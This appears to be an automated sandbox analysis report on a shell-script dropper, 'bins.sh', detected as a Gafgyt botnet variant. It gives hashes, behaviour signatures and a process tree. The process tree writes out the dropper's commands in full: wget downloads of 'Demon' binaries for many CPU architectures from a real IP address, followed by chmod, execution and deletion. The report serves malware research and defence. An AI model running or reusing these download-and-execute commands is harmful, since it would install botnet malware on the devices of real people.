Analysis
-
max time kernel
23s -
max time network
26s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
19-10-2024 11:41
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral8
Sample
bins.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
2KB
-
MD5
a754f4cf9d6ba2d574cd90bf04d1bc35
-
SHA1
b0191e89c26057b6132f3314fa685e1879c7dc62
-
SHA256
bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
-
SHA512
600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config
Signatures
-
Detected Gafgyt variant 1 IoCs
Processes:
resource yara_rule /tmp/Demon.mips family_gafgyt -
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 778 chmod 792 chmod 807 chmod 751 chmod 761 chmod 766 chmod 730 chmod 746 chmod 756 chmod 824 chmod 740 chmod 836 chmod 841 chmod 846 chmod -
Executes dropped EXE 1 IoCs
Processes:
Demon.mipsioc pid process /tmp/Demon.mips 731 Demon.mips -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
Demon.mpsldescription ioc process File opened for reading /proc/net/route Demon.mpsl -
Changes its process name 1 IoCs
Processes:
Demon.mpsldescription pid process Changes the process name, possibly in an attempt to hide itself 741 Demon.mpsl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
Demon.mpsldescription ioc process File opened for reading /proc/net/route Demon.mpsl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetDemon.mipsrmpid process 710 wget 731 Demon.mips 735 rm -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/Demon.x86 wget File opened for modification /tmp/Demon.arm4 wget File opened for modification /tmp/Demon.arm5 wget File opened for modification /tmp/Demon.m68k wget File opened for modification /tmp/Demon.mips wget File opened for modification /tmp/Demon.mpsl wget File opened for modification /tmp/Demon.sh4 wget File opened for modification /tmp/Demon.arm6 wget File opened for modification /tmp/Demon.i686 wget File opened for modification /tmp/Demon.ppc wget File opened for modification /tmp/Demon.i586 wget File opened for modification /tmp/Demon.sparc wget File opened for modification /tmp/Demon.arm7 wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:707
-
/usr/bin/wgetwget http://38.123.149.216/Demon.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:710 -
/bin/chmodchmod +x Demon.mips2⤵
- File and Directory Permissions Modification
PID:730 -
/tmp/Demon.mips./Demon.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:731 -
/bin/rmrm -rf Demon.mips2⤵
- System Network Configuration Discovery
PID:735 -
/usr/bin/wgetwget http://38.123.149.216/Demon.mpsl2⤵
- Writes file to tmp directory
PID:736 -
/bin/chmodchmod +x Demon.mpsl2⤵
- File and Directory Permissions Modification
PID:740 -
/tmp/Demon.mpsl./Demon.mpsl2⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:741 -
/bin/rmrm -rf Demon.mpsl2⤵PID:744
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sh42⤵
- Writes file to tmp directory
PID:745 -
/bin/chmodchmod +x Demon.sh42⤵
- File and Directory Permissions Modification
PID:746 -
/tmp/Demon.sh4./Demon.sh42⤵PID:747
-
/bin/rmrm -rf Demon.sh42⤵PID:749
-
/usr/bin/wgetwget http://38.123.149.216/Demon.x862⤵
- Writes file to tmp directory
PID:750 -
/bin/chmodchmod +x Demon.x862⤵
- File and Directory Permissions Modification
PID:751 -
/tmp/Demon.x86./Demon.x862⤵PID:752
-
/bin/rmrm -rf Demon.x862⤵PID:754
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm62⤵
- Writes file to tmp directory
PID:755 -
/bin/chmodchmod +x Demon.arm62⤵
- File and Directory Permissions Modification
PID:756 -
/tmp/Demon.arm6./Demon.arm62⤵PID:757
-
/bin/rmrm -rf Demon.arm62⤵PID:759
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i6862⤵
- Writes file to tmp directory
PID:760 -
/bin/chmodchmod +x Demon.i6862⤵
- File and Directory Permissions Modification
PID:761 -
/tmp/Demon.i686./Demon.i6862⤵PID:762
-
/bin/rmrm -rf Demon.i6862⤵PID:764
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc2⤵
- Writes file to tmp directory
PID:765 -
/bin/chmodchmod +x Demon.ppc2⤵
- File and Directory Permissions Modification
PID:766 -
/tmp/Demon.ppc./Demon.ppc2⤵PID:767
-
/bin/rmrm -rf Demon.ppc2⤵PID:769
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i5862⤵
- Writes file to tmp directory
PID:770 -
/bin/chmodchmod +x Demon.i5862⤵
- File and Directory Permissions Modification
PID:778 -
/tmp/Demon.i586./Demon.i5862⤵PID:780
-
/bin/rmrm -rf Demon.i5862⤵PID:783
-
/usr/bin/wgetwget http://38.123.149.216/Demon.m68k2⤵
- Writes file to tmp directory
PID:784 -
/bin/chmodchmod +x Demon.m68k2⤵
- File and Directory Permissions Modification
PID:792 -
/tmp/Demon.m68k./Demon.m68k2⤵PID:794
-
/bin/rmrm -rf Demon.m68k2⤵PID:797
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sparc2⤵
- Writes file to tmp directory
PID:798 -
/bin/chmodchmod +x Demon.sparc2⤵
- File and Directory Permissions Modification
PID:807 -
/tmp/Demon.sparc./Demon.sparc2⤵PID:808
-
/bin/rmrm -rf Demon.sparc2⤵PID:812
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm42⤵
- Writes file to tmp directory
PID:813 -
/bin/chmodchmod +x Demon.arm42⤵
- File and Directory Permissions Modification
PID:824 -
/tmp/Demon.arm4./Demon.arm42⤵PID:825
-
/bin/rmrm -rf Demon.arm42⤵PID:829
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm52⤵
- Writes file to tmp directory
PID:830 -
/bin/chmodchmod +x Demon.arm52⤵
- File and Directory Permissions Modification
PID:836 -
/tmp/Demon.arm5./Demon.arm52⤵PID:837
-
/bin/rmrm -rf Demon.arm52⤵PID:839
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm72⤵
- Writes file to tmp directory
PID:840 -
/bin/chmodchmod +x Demon.arm72⤵
- File and Directory Permissions Modification
PID:841 -
/tmp/Demon.arm7./Demon.arm72⤵PID:842
-
/bin/rmrm -rf Demon.arm72⤵PID:844
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc440fp2⤵PID:845
-
/bin/chmodchmod +x Demon.ppc440fp2⤵
- File and Directory Permissions Modification
PID:846 -
/tmp/Demon.ppc440fp./Demon.ppc440fp2⤵PID:847
-
/bin/rmrm -rf Demon.ppc440fp2⤵PID:848
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
211KB
MD5455a2acf75de8da6ab7c4d9564cc69f9
SHA19e6016c6581289e685bcd6392bbf0bcf6b1182ff
SHA256b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
SHA512a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab